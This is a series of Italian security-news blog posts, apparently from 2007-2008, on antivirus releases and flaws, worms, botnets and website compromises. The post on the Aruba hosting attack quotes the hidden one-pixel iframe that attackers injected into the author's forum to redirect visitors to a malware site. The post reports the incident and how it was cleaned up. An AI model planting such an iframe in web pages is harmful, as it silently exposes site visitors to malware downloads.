.:: Securnetwork.net Blog - Massimo Rabbi ::.

I creatori del noto software anti-spyware SpyBot Search&Destroy si son dati da fare e hanno realizzato un aggiornamento sotto forma di plugin che consente di cercare e individuare eventuali rootkits.
Il tool può essere eseguito anche come programma standalone.

RootAlyzer, questo il nome del software, è ancora in fase di sviluppo ma può essere scaricato gratuitamente dal forum di Spybot Search&Destroy. Agisce controllando il registro, il file system e i processi in esecuzione alla ricerca di incoerenze e utilizzi sospetti di chiamate di sistema di vario tipo e API Win32 (possibile segnale di rootkits “a bordo”).

Per effettuare il download del programma cliccate qui.

RIFERIMENTI:
- L’annuncio sul sito di Spybot Search&Destroy
- Spybot Search&Destroy learns to sniff out rootkits, by Heise Security

Condividi

La società di sicurezza Finjan ha scoperto sul web un database contenente all’incirca 8700 account ftp rubati e appartenenti a siti web, alcuni dei quali di “alto profilo”: società governative, servizi finanziari, fornitori tecnologi e industriali oltre a vari security vendors.
La maggior parte appartiene a organizzazioni dislocate negli Stati Uniti e Russia, con l’Australia e i paesi asiatici del pacifico al secondo posto.

Il database sembra sia stato ricavato mediante l’uso di Neosploit versione 2, uno fra i numerosi toolkits automatici che facilitano attacchi di tipo iframe injection sui server web per la distrubuzione di trojans.
Di origine chiaramente russa il software è caratterizzato da una interfaccia utente ben realizza che include anche un “servizio statistiche”.

Nel suo “Malicious Page of the Month” di febbraio, Finjan descrive in maniera approfondita il “crimeware tool”, incluso un componente chiamato FTP-Toolz pack 2.7, che in aggiunta ad installare iframes, può importare e esportare liste di account da database come quello scoperto di recente.

APPROFONDIMENTI:
- Over 8000 ftp credentials found on crimeware database, by Heise Security
- Malicious Page of the Month - February 2008, report by Finjan

Condividi

Il fatto che Windows sia il sistema sicuramente più diffuso è dato di fatto, così come che la maggior parte del malware e dei virus sviluppati dai vari crackers abbia come target piattaforme Microsoft, Vista o Xp che sia.
Spesso si scatenano su forum, blog, siti tecnici o meno vere e proprie guerre di religione tra i vari “taleban linux” e “taleban windows”.
Gli uni a sostenere Windows è meglio di Linux perchè blablabla, gli altri viceversa a dire Windows è una ciofecca usate Linux se volete essere dei “veri fighi”, superprotetti da qualsiasi minaccia.
Quello che penso è che non esiste un sistema operativo che possa definirsi “MIGLIORE” di altri, ognuno nel bene e nel male ha i suoi pregi e difetti.
Per motivi di lavoro uso Windows XP (in particolare) quasi tutto il tempo. Ai tempi dell’università ho smanettato parecchio con Linux, in tutte le varie salse: anche qui sul numero di distribuzioni Linux che prolificano si potrebbe aprire un dibattito.
Così come mi diverto ogni tanto a provare le varie security-distro Backtrack, Hakin9, Helix, Phlak e chi più ne ha più ne metta, anche se ormai il tempo è quello che è. Ho installato e mantenuto un serverino a casa con OpenBSD 3.9 per alcuni mesi, fino alla rottura di un disco
L’indole da smanettone ti porta poi a provare anche s.o. non troppo diffusi: il mitico QNX o il buon vecchio BeOS (ora rimpiazzato da Haiku).
Di tutti quanti ti fai un’impressione, a volte più o meno superficiale per questioni di tempo o per via di un primo impatto non troppo positivo.

Quando ho letto questa news su Heise Security riguardo il moltiplicarsi di macchine Linux che “entrano a far parte” delle cosiddette botnets, un po’ mi è venuto da sorridere.
Pensavo a come molto spesso si decanti tanto la superiorità di Linux (per carità molto spesso a ragione), e poi si legga come una backdoor (Linux/Rst-B backdoor) di ben 6 anni fa sia il motivo principale del problema.
L’indagine realizzata da Sophos evidenzia come stia aumentando il numero di Linux servers che vengono infettati e diventino a tutti gli effetti zombies pc nelle mani di crackers sparsi nel globo pronti ad utilizzarli come nodi per gli attacchi più svariati (spam, DDoS, etc.).
Come suggerisce l’articolo già solo il fatto di avere anche su Linux installato un antivirus basterebbe ad evitare tutto ciò, visto che la vulnerabilità in questione è individuabile da tutti gli antivir in circolazione.
Tra quelli free ricordiamo:
* Avira: Avira AntiVir PersonalEdition Classic
* AVG Technologies (formerly Grisoft) AVG Anti-Virus Free Edition 7.5 for Linux
* Avast: avast! Linux Home Edition Download
* F-Prot: F-PROT Antivirus for Linux Workstations
* ClamAV: Clam AntiVirus

La verità è quella racchiusa in una frase che fa il giro della rete da anni e che sembra estratta da un vecchio proverbio: “l’unico sistema sicuro è quello spento“.
D’altronde anche Windows può essere reso un po’ più sicuro in pochi passaggi:
- lavorare sempre e cmq con un account non privilegiato, si puo’ fare tutto dal programmare al giocare
- installare un buon firewall e antivirus
- installare un paio di tools per la rilevazione di spyware e malware
Ci vuole poi cosi’ tanto?

APPROFONDIMENTI:
* Sophos: Linux machines hijacked for botnets, by Heise Security
* Botnets, a free tool and 6 years of Linux/Rst-B, blog entry by Sophos
* Botnet study: bots spread through old loopholes

Condividi

A quanto pare recentemente (28 gennaio scorso) StopBadware, l’iniziativa creata da varie società IT e istituzioni, ha classificato il noto software RealPlayer come “badware”.
Questo nomignolo viene affibiato a tutti quei software come spyware, adware e malware di vario tipo che “spiano nel tempo” la navigazione degli utenti (tracciandone le abitudini), generano una miriade di finestre popup contenenti pubblicità e nei casi peggiori addirittura tentano di intercettare le password memorizzate sui computer infetti.

Il motivo per cui StopBadware ha classificato RealPlayer 10.5 come badware è perchè il software in questione non espone in maniera chiara all’utente finale che viene installato anche un adware. Il componente pubblicitario è il cosiddetto RealPlayer Message Center. L’EULA (End User License Agreement) per RealPlayer indica che questo componente fornisce aggiornamenti importanti/utili. In realtà Message Center continua a mostrare un fastidioso avviso se gli utenti non registrano i propri dati personali creando un account su RealNetworks.

RealPlayer 11 dal canto suo non informa l’utente che il player Rhapsody (utile per l’online music store di RealNetworks) viene installato, ma non rimosso quando si va ad effettuare la disinstallazione del prodotto.
Nessun avviso ne’ in fase di installazione, ne’ in fase di disinstallazione avverte l’utente del legame che c’è tra RealPlayer e il Rhapsody Player.

Attualmente la versione 10.5 viene installata anche attraverso il Mozilla Plugin Finder, mentre la 11 è disponibile per il download direttamente sull’homepage di RealPlayer.
StopBadware sconsiglia quindi vivamente l’installazione di questo software e in particolare di queste versioni fino a quando RealNetworks non risponderà alla segnalazione rilasciando una versione pulita del proprio programma.

In alternativa è possibile usare VLC Mediaplayer per ascoltare musica in formato RealMedia, prestando però attenzione ai data stream RTSP visto che il software soffre ancora di un bug scoperto qualche settimana fa.
Altra possibilità è l’uso di Real Alternative, player che incorpora i codec RealPlayer, tuttavia senza il permesso di RealNetworks.
Risulta evidente che si tratta di una soluzione non propriamente legale

RIFERIMENTI:
- StopBadware initiative rates RealPlayer as “badware”, by Heise Security
- RealPlayer, report by StopBadware

Condividi

Grisoft ha reso disponibile e scaricabile a tutti la beta della nuova versione di AVG, la 8 per l’appunto.
Il software a quanto dichiarato offre nuove funzionalità e sembra sia stato riscritto quasi completamente.
AVG 8 si presenta con una nuova interfaccia.

Le nuove features includono un modulo per il controllo web e per il traffico di instant messaging, il filtro per gli script LinkScanner sviluppato dalla neo-acquisita Exploit Prevention Labs, e un componente anti-rootkit.
Il nuovo motore di scansione si presuppone abbia migliorato l’euristica e le capacità di individuare nuovi virus.
Migliorata a quanto si dice anche la velocità e diminuito il consumo di risorse.
Nonostante l’interfaccia sia stata pensata per rendere più semplice l’accesso alle varie funzioni per gli utenti meno esperti, è ancora possibile accedere dal menu alle funzionalità avanzate.
Per dare uno sguardo da vicino alla nuova versione è sufficiente registrarsi e scaricare la beta.
Le versioni supportate di Windows sono Windows 2000,2003,XP,Vista e le versioni 64-bit di XP, Vista, 2000 Server, 2003.
AVG 8 beta rimarrà disponibile per il download fino al 1 marzo 2008.

RIFERIMENTI:
- Public beta for AVG 8: news by Heise Security
- Download AVG 8 beta (necessaria registrazione)

Condividi

Symantec ha reso disponibile la beta di Norton 360 Versione 2.
La suite di sicurezza all-in-one è costituita dai seguenti moduli: antivirus e antispyware, personal firewall, intrusion prevention, anti-phishing. E’ inoltra inclusa anche una funzionalità di clean-up del sistema operativo e un modulo per il backup.

Nella versione 2, sono stati introdotti componenti addizionali come il Browser Defender che in Internet Explorer tenta di identificare e prevenire i tentativi di installazione automatica di malware. Presente anche un gestore di passwords per memorizzare i propri account e per la compilazione assistita/automatica durante la navigazione.
E infine stando a quanto dichiarato la funzionalità di backup sarebbe ora in grado di creare copie su dischi Blu-ray e su iPod.

La fase di beta sembra durerà per circa 4 settimane.
La versione finale dovrebbe comparire dopo poche settimane, il tempo di ultimare gli ultimi fixing e processi minori come la localizzazione.

LINK PER IL DOWNLOAD: Norton 360 V2 Beta

Condividi

Alwil ha rilasciato di recente un aggiornamento per il proprio engine di scansione avast! in modo da correggere almeno due bugs di sicurezza.
L’engine antivirus utilizzato in versioni precedenti alla 4.7.1098 di avast! 4 Home e Professional edition è vulnerabile a potenziali attacchi che prendano di mira l’unpacker per file .tar e .rar.
Stando al report almeno nel caso della vulnerabilità riguardante i file .tar, aprire una mail “infetta” o visitare un sito appositamente modificato è sufficiente per incappare nel bug e vedere il proprio sistema compromesso.

Ad ogni modo gli utenti avast! dovrebbero aver già ricevuto la versione aggiornata 4.7.1098 attraverso il sistema di automatic update.
Detto questo, esistono pero’ altri software che utilizzano il motore avast! ma non è chiaro se utilizzino gli unpackers di avast! oppure i propri.
Un esempio sono GDATA AntiVirusKit 2007 e 2008 che utilizzano l’engine avast e sono di conseguenza anch’essi vulnerabili. Anche GDATA sta pensando di distribuire un aggiornamento tra il sistema di update automatico.

RIFERIMENTI:
* Security update for avast! anti-virus, by Heise Security
* Version 4.7.1098, avast! 4 Home/Professional revision history
* Avast! AntiVirus TAR Processing Remote Heap Corruption, security advisory from Nevis Labs

Condividi

Apple ha rilasciato l’aggiornamento firmware 1.1.2 per l’iPhone e iPod Touch, che corregge le falle scoperte nella libreria TIFF, usate dai possessori di iPhone per eseguire codice di terze parti e personale.
Una volta installato da iTunes, l’aggiornamento impedisce l’esecuzione di codice di terze parti sfruttando files TIFF manipolati.
La falla è stata sfruttata in alcune occasioni da utenti malintenzionati per fare injection di codice arbitrario sul dispositivo.

Gli utenti iPhone desiderosi di far girare le proprie applicazioni personali dovranno attendere ora il rilascio del Software Development Kit (SDK), in programma per febbraio 2008.
Detto questo sono pero’ in circolazione su internet nei vari siti e forum dedicati, le istruzioni su come installare l’aggiornamento senza perdere la possibilità di far girare codice di terze parti (vedi Unofficial Apple Weblog).
L’aggiornamento è invece una priorità di sicurezza per tutti coloro che usano l’iPhone o l’iPod Touch per navigare su Internet.

LINKS:
- About the security content of iPhone v1.1.2 and iPod Touch v1.1.2 Updates, Apple’s security advisory
- Apple closes TIFF hole in iPhone, news by Heise Security

Condividi

I Kaspersky Lab hanno rilasciato una versione aggiornata del proprio controllo ActiveX che viene installato sul pc degli utenti che usano il Kaspersky Online Scanner.
La nuova versione del componente (kavwebscan.dll) è la 5.0.98.0 e risolve alcuni bug critici che possono essere sfruttati per eseguire codice arbitrario, per esempio quando un ignaro utente sta visitando un sito web, appositamente modificato, con Internet Explorer.

Stando all’advisory pubblicato da iDefense, la vulnerabilità è dovuta ad errori format string in svariate funzioni del controllo.
L’esistenza di una vulnerabilità è stata confermata nella versione 5.0.93.0, ma è probabile interessi anche versioni precedenti.
Per controllare la versione installata sul proprio pc, è possibile controllare direttamente nella cartella
C:\WINDOWS\system32\Kaspersky Lab\Kaspersky Online Scanner
Nel caso la versione dell’ActiveX non venga mostrata direttamente nel filename è possibile, previo click col tasto destro sull’icona, analizzare il tab “Proprietà”.
Il consiglio è che chiunque utilizzi l’Online Scanner aggiorni immediatamente il controllo.
Per installare l’ultima versione è sufficiente lanciare lo scanner. Un’altra opzione è naturalmente quella di cancellare la dll vulnerabile.

LINKS:
- Kaspersky Lab announces the release of a new version of its free Kaspersky Online Scanner
- Kaspersky Web Scanner ActiveX Format String Vulnerability, iDefense Advisory
- Kaspersky Online Scanner installed vulnerable ActiveX control , by Heise-Security

Condividi

E’ stato scoperto di recente un nuovo tipo di worm, che tenta di cancellare tutti i file MP3 che riesce a individuare all’interno del pc di un utente.
Per fare ciò il worm, chiamato W32/Deletemp3.worm (McAfee), W32.Deletemusic (Symantec) o Win32/AutoRun, si comporta in maniera molto simile a W32/Napir-B, che salì alla ribalta verso la metà del 2005.

Una volta infettato il sistema,Deletemp3, che è stato programmato in Delphi, si aggiunge nell’autostart di Windows in maniera da potersi riattivare ogni qualvolta il pc viene riavviato.
McAfee fa notare come, poichè i percorsi del programma sono fissi, il worm non funziona correttamente in Windows 2000.
Disattiva inoltre il Task Manager e il menu contestuale per le cartelle in Windows Explorer.
Fatto questo procede a cancellare tutti gli mp3 che individua sul disco.
Per propagarsi inoltre, Deletemp3 crea i files autorun.inf e csrss.exe su tutti gli eventuali hard-disk da E: a O:.
Con i dispositivi rimovibili infatti il malware viene eseguito in maniera automatica sfruttando l’autorun, ad esempio inserendo una chiavetta usb infetta.
Il livello di diffusione del virus è tuttavia molto basso e la maggior parte degli antivirus già dispongono delle firme per individuarlo.

LINKS:

• W32/Deletemp3.worm, Malware description from McAfee
• New malware deletes MP3 files , news su Heise Security

Condividi

Questa mattina quando ho aperto iTunes per far partire alcuni .mp3 il buon vecchio KIS ha attivato il suo filtro anti-phishing segnalandomi che si stava tentando di instaurare una connessione con un sito http “malevole”.
Al che la cosa mi è sembrata strana. Sul primo momento ho pensato potesse trattarsi di un qualche malware che avesse infettato e “modificato” itunes, per cercare di fregare username e password degli utenti iStore.
In realtà la spiegazione è ben piu’ semplice: si tratta di un semplice falso positivo.
Infatti il mio passo successivo è stato andare a controllare sul forum di kasperksy se qualcuno aveva avuto problemi analoghi, visto comunque che il problema si è presentato oggi per la prima volta.
In effetti più di un utente ha postato a riguardo.
Relativamente al dubbio espresso da un utente riguardo al fatto che l’URL bloccato contenga la stringa “edgesuite.net” che farebbe pensare ad un ipotetico fake URL, posso solo dire che cercando su Google si legge come Edgesuite sia una delle tecnologie fornite da Akamai.
Per chi non conoscesse Akamai, si tratta di una società con una enorme rete di servers distribuita su tutto il pianeta in una settantina di paesi e che viene sfruttata da moltissime mega-aziende del calibro di Microsoft, Google, Yahoo e Apple appunto, per velocizzare la distribuzione di contenuti audio, video e file in generale.
In pratica i servers Akamai fanno da mirrors in maniera perfettamente trasparente all’utente, e cosi’ mentre siamo convinti di scaricare dal sito della Microsoft l’ultimo service pack, in realtà lo stiamo scaricando da uno dei servers Akamai sparsi in giro per il globo.
Qualche info in più su Akamai potete trovarla sul loro sito web e anche su Wikipedia.
Ecco qui l’immagine dell’allarme phising di KIS.

Detto questo si puo’ stare tranquilli, si tratta solo di aggiornare l’antivirus.
Alle ore 11.26 ho effettuato l’update e il problema non esiste più
Un caso analogo di falso positivo mi era successo con Skype che dalla Difesa Pro-Attiva veniva individuato come keylogger.

Condividi

I prodotti antivirus ClamAV e AVG contengono alcune vulnerabilità che possono essere sfruttate per eseguire attacchi di tipo DoS (Denial-of-Service) o consentire l’escalation di privilegi di utenti locali.
Nel frattempo, Microsoft ha rilasciato una beta gratuita del proprio prodotto di sicurezza Live OneCare 2.0.

Stando ad un advisory di Metaeye Security, il processing di file RAR corrotti comporta una null pointer dereference, che porta al crash del software ClamAV.
Gli sviluppatori del prodotto hanno rilasciato la versione 0.91, che fixa il bug.

Per quanto riguarda AVG, il kernel driver avg7core.sys soffre di problemi nella fase di processing degli IRPs (interrupt request packets): il risultato è la possibilità per gli utenti di sovrascrivere spazi di memoria del kernel ottenendo i privilegi di SYSTEM.
Il produttore Grisoft ha fornito delle versioni patchate già disponibili per il download in modalità manuale e automatica.

Nella versione OneCare 2.0 beta rilasciata da Microsoft c’è una particolare attenzione per le reti casalinghe. Mentre la versione 1.5 garantiva l’utilizzo di fino ad un massimo di 3 utenti concorrenti, la versione 2.0 fornisce una funzionalità che consente ad un computer di gestire anche tutti gli altri clients.
Questo per esempio consente di gestire in maniera centralizzata gli updates dei sistemi client, restando sempre aggiornati sulla status di sicurezza dei pc controllati.
Gli utenti del software inoltre possono comprare una spazio di storage online per salvare i propri backup in Windows Live Folders.

RIFERIMENTI:

Condividi

La polizia spagnola ha proceduto all’arresto di un 28enne sospettato di aver creato e distribuito un virus a più di 115.000 telefoni cellulari.
Le agenzie di stampa spagnola riportano che la polizia era sulle tracce del sospetto da ben 7 mesi.
Si tratta del primo arresto effettuato in Spagna con un’accusa di questo tipo.

Stando agli investigatori il virus infetta unicamente cellulari con il bluetooth attivato e che montano un sistema operativo Symbian.
Il virus sembra si diffondesse sotto forma di MMS dall’ipotetico contenuto erotico, o a seconda dei casi riportando informazioni sportive o addirittura del software antivirus.
La polizia ha affermato che gli effetti del virus hanno provocato danni per circa sette milioni di euro.

Condividi

In questi ultimi giorni sui blog e sui siti web più disparati, non si è fatto altro che parlare del massiccio attacco subito da numerosi siti web hostati su server Aruba.
Il modus operandi rispecchia in pieno  quanto avvenuto  lo scorso mese per i sistemi di Hosting Solutions.
L’intrusione ha infatti consentito a degli attacker di modificare le pagine web di svariati siti web inserendo un IFRAME che effettuasse il redirect degli utenti verso siti web contenenti malware.
Di seguito riporto il link a tre articoli che spiegano molto bene l’accaduto:
- Server Aruba sotto attacco, allarme in Italia
- Possibile intrusione nei sistemi Aruba
- L’italia sotto pesante attacco malware
Dalle cose lette qui e in altre pagine sembra sia stato sfruttato un tool automatizzato per lanciare attacchi malware: il software in questione è chiamato MPACK.
Panda Software ha pubblicato un interessantissimo report che analizza nel dettaglio questo tool: lo potete scaricare qui.

Il problema ha interessato direttamente anche noi di TechTown. In particolar modo è stato colpito il forum con risultante inserimento del seguente frammento IFRAME:
<iframe src=”http://zaq-home.org/x/index.php” width=”1″ height=”1″></iframe>
Del problema mi son accorto grazie alla segnalazione di Kaspersky Internet Security che ha prontamente bloccato il tentativo di download di due malware, nella fattispecie due Trojan.Downloader.

Acid ha rimosso il problema che sembra fosse dovuto ad una modifica nel campo templates del database del forum dove sembra sia stato aggiunto il codice, in particolare il board wrappers.
Abbiamo proceduto anche  ad una verifica dei file dell’intero ftp e cercato di verificare se tutto fosse funzionante.
Nel frattempo Aruba sembra non dire nulla a riguardo. Penso che una comunicazione via mail globale a tutti i propri utenti sarebbe stata cosa buona e giusta, per informare del possibile pericolo e del possibile coinvolgimento nell’attacco di questo o quel server anche in base alle tante segnalazioni degli utenti.
Il consiglio è quello di tenere sempre l’antivir aggiornato, meglio se di quelli che hanno la funzionalità integrata di web protection.

Condividi

I vari prodotti di sicurezza della nota casa Kaspersky lavorano a stretto contatto col sistema operativo, impiegando un driver che tra le altre cose monitora anche le chiamate di sistema di Windows. Il controllo sul passaggio di parametri effettuato dal driver non sembra essere però corretto: ciò apre la porta a possibile attacchi che sfruttando dati non validi portano al crash del sistema.
Il security provider MatouSec, che ha segnalato il bug, lascia intendere che questa falla potrebbe essere ben più pericolosa di quanto sembri, alludendo a potenziali attacchi di tipo “code injection and execution“.

I prodotti di sicurezza molto spesso si “agganciano” alle funzioni di sistema con lo scopo di monitorare lo stato di funzionamento ed esecuzione di una macchina.
Mediante chiamate alla System Service Descriptor Table (SSDT) è possibile determinare quali programmi sono attivi sul computer e cosa stanno facendo: è possibile quindi prendere decisioni appropriate e interrompere per esempio l’esecuzione di un programma che abbia un comportamento “potenzialmente malevole”. Un’altra funzionalità importante è che questo consente di evitare che potenziale malware tenti di intaccare il comportamento dei software di sicurezza stessi.

Il driver klif.sys si aggancia a svariate syscalls tra cui NtCreateKey, NtCreateProcess, NtCreateProcessEx, NtCreateSection, NtCreateSymbolicLinkObject, NtCreateThread, NtLoadKey2, NtOpenKey e NtOpenProcess.
Se un programma effettua una chiamata ad una di queste funzioni con parametri non validi, il computer crasha e riparte.

Un interessante post su RootKit.com di EP_XoFF spiega questa vulnerabilità (presumibilmente piuttosto datata) usando la funzione NtOpenProcess.
Kaspersky ha reagito alle segnalazioni postando il proprio advisory di sicurezza e annunciando una patch che la compagnia distribuirà a breve tramite il sistema di automatic update.
Kaspersky ha classificato la minaccia come “low”, poichè richiede che un utente locale esegua il software malevole.
Stando all’advisory, la vulnerabilità non consentirebbe l’escalation di privilegi o l’esecuzione di codice esterno.
Le versioni interessate dal problema sembrano essere: Kaspersky Antivirus 6 e 7, Internet Security 6 e 7, Anti-Virus for Windows Workstations 6 e Anti-Virus 6 for Windows Servers, per sistemi operativi da Windows NT a Windows 2003. Sotto Windows Vista sembra che il famigerato crash di sistema non si verifichi.

Questo annunci conferma la crescente tendenza nella scoperta di bug che interessano software dedicati alla sicurezza. I bug scoperti negli antivirus di F-Secure, Grisoft e Avira (tra gli altri) sono legati a problemi di buffer overflows e format string vulnerabilities.
Questi fenomeni per la maggior parte sono da imputare il più delle volte ad una carenza per i dettagli durante la fase di programmazione.
Questo trend non lascia di certo ben sperare, è quindi auspicabile che ci sia un cambiamento di rotta, in virtù del fatto che software come personal firewall e antivirus sono la prima linea di difesa contro la diffusione su larga scala di malware e virus di ogni tipo.

LINKS:

Condividi

E’ stata rilasciata il 7 giugno la nuova versione del famoso software per la rimozione di spyware e malware di casa Lavasoft.
La nuova release targata Ad-Aware 2007 è disponibile in tre versioni: Free, Plus e Pro.

In breve le nuove caratteristiche più importanti:
- Engine di scansione completamente nuovo: più preciso e più performante
- Migliorata la tecnologia Code Sequence Identification (CSI) che identifica nuove possibili minaccie e malware nascosto
- Cambiamenti al sistema di update per risparmiare tempo e risorse
- Nuovo tool TrackSweep per cancellare le tracce lasciate durante la navigazione
- Supporto a diversi browser: Internet Explorer, Firefox, e Opera.
- Nuova interfaccia utente

Link: Ad-Aware 2007 Free

Condividi

Panda software ha recentemente rilasciato una versione della sua Internet Security Suite 2007 pienamente compatibile con Windows Vista.
La nuova versione gira comunque anche su Windows XP e include un modulo backup che consente di effettuare in maniera automatizzata il salvataggio dei dati utente.
E’ incluso inoltre un “coupon” gratuito di due mesi per l’utilizzo di un servizio di backup online (per il quale è necessario un apposito installer da scaricare) dello spazio di 1 GB.
E’ stata migliorata la parte anti-rootkit basandosi sul sistema signature-based e sull’analisi del comportamento del software usando il sistema Panda TruPrevent.
Il filtro di navigazione inoltre ora oltre a bloccare siti di phishing dovrebbe impedire l’accesso a siti che tentino in qualche modo di installare malware sul computer dell’utente.
Gli utenti delle precedenti versioni di Panda Internet Security Suite 2007 possono scaricare dal sito web la nuova versione ed utilizzare la license key attuale.

- Annuncio del rilascio della nuova release, sul sito di Panda Software

Condividi

Ultimamente il registro del vostro Skype si è popolato una marea di chiamate non risposte? Forse allora dovreste pensare ad una scansione completa del vostro sistema.
Ironia a parte, ultimamente stando alle rilevazioni di F-Secure, un worm per piattaforma Windows, Pykse (IM-Worm:W32/Pykse.A), farebbe in modo di impostare lo stato di un client Skype in “Non disturbare”, in maniera che un utente non riceva più chiamate in entrata, ma unicamente avvisi di mancata risposta.
Il comportamento del worm non si limita solo a questo, il virus infatti invia un messaggio a tutti i propri contatti online contenente un link che invita a scaricare il malware. Quanto il programma viene lanciato compare l’immagine di “una donna in abiti succinti” (che fantasia! n.d.r.).
Dopo aver infettato il computer, Pykse contatta vari siti web aggiornando un contatore che tiene conto del numero di infezioni.
A parte manipolare i settaggi Skype, il malware non sembra provocare danni veri e propri e nemmeno di scansionare dati sensibili (username, password, etc.). F-Secure non ha dato indicazioni circa il potenziale numero di infezioni.
Già in dicembre avevamo assistito alla diffusione di un worm per Skype che tentava di scovare le passwords dell’utente.

LINK:
- Report sul worm, dal blog di F-Secure

Condividi

Controllando le statistiche di accesso a Securnetwork mi sono accorto di come ultimamente la pagina più visitata sia quella di qualche giorno fa relativa al post sul virus “Photo Album.zip” che circola in Msn Messenger.
Andando a vedere le pagine di provenienza, mailing list e forum, mi è capitato di vedere riportate alcune inesattezze: forse chi ha letto in queste pagine non l’ha fatto attentamente.
Ecco qui alcuni chiarimenti:
- il virus non è legato ad un contatto msn particolare… vedi per esempio il contatto dadecarlo@hotmail.it che sembra essere stato preso come “fonte primaria” di diffusione virus. Il messaggio con l’invito a scaricare lo zip vi arriva da un qualunque contatto sia stato infettato dal virus e non da uno in particolare.
- visto che personalmente non ho scaricato lo zip, mi affido a quanto riportato dal sito C.I.S.R.T. del quale ho elencato ben tre post riguardanti il virus… forse qualcuno non si è preso la briga di andare a leggere. all’interno del file .zip pare ci siano un file .pif che è il virus vero e proprio.
Il virus non lo si prende semplicemente cliccando sullo zip.
- non avendo preso il virus fortunatamente non mi sono trovato nella situazione di doverlo rimuovere, rispondo quindi anche a coloro che mi hanno contattato via mail, che la procedura di rimozione più esauriente che ho trovato è questa.
Anche qui avevo segnalato il link nei commenti ma forse qualcuno non ci ha prestato attenzione. Unica cosa da dire è che la procedura chiaramente fa riferimento ad una particolare variante… quindi può benissimo essere che abbia bisogno di qualche aggiustamento o passaggio in più o in meno a seconda della variante in cui si può essere incappati. Se avete altre procedure di rimozioni chiare da segnalarmi fatelo pure, sarò ben lieto di pubblicarlo all’interno del post.

Spero sia tutto… per altri chiarimenti potete tranquillamente contattarmi… ma almeno questa volta fatelo dopo aver letto attentamente

UPDATE 22/04/2007:
Consultate la guida su p2pforum:
http://www.p2pforum.it/forum/showthread.php?t=174815
In particolare scaricate il tool MSNFIX, semplice da usare visto che dal 20 aprile è disponibile anche in inglese!
Spero sia tutto!

Condividi

Dopo la recente reinstallazione ho messo come soluzione di sicurezza all-in-one KIS acronimo per Kaspersky Internet Security.
Non starò qui a tessere nuovamente le lodi di Kaspersky come prodotto antivirus, secondo me il top attualmente sul mercato, ma segnalo un interessante comportamento del sistema di “Difesa proattiva”.
Nelle intenzioni questa funzionalità dovrebbe consentire di bloccare e segnalare i comportamenti sospetti da parte di alcuni software che potrebbero rivelarsi virus o malware non ancora scoperti e/o classificati.
Se da un lato questa funzionalità sembra essere decisamente utile (almeno sulla carta) per “blindare” ulteriormente il proprio sistema, i commenti che si leggono a riguardo su Internet non sono certo dei più entusiasti.
Detto questo segnalo appunto un caso di falso positivo.
Nella fattispecie Skype viene segnalato come ipotetico Keylogger

Tutto ok… nulla di cui preoccuparsi anche se di certo Skype non è da classificare come uno di quei “software” dal comportamento chiaro e pulito.
Su un topic nel forum ufficiale del sito Kaspesky si trova una lista di tutti i software non malware che il sistema di difesa proattiva segnala come virus/badware.
Link: Kaspersky Proactive Defense “White List”

Condividi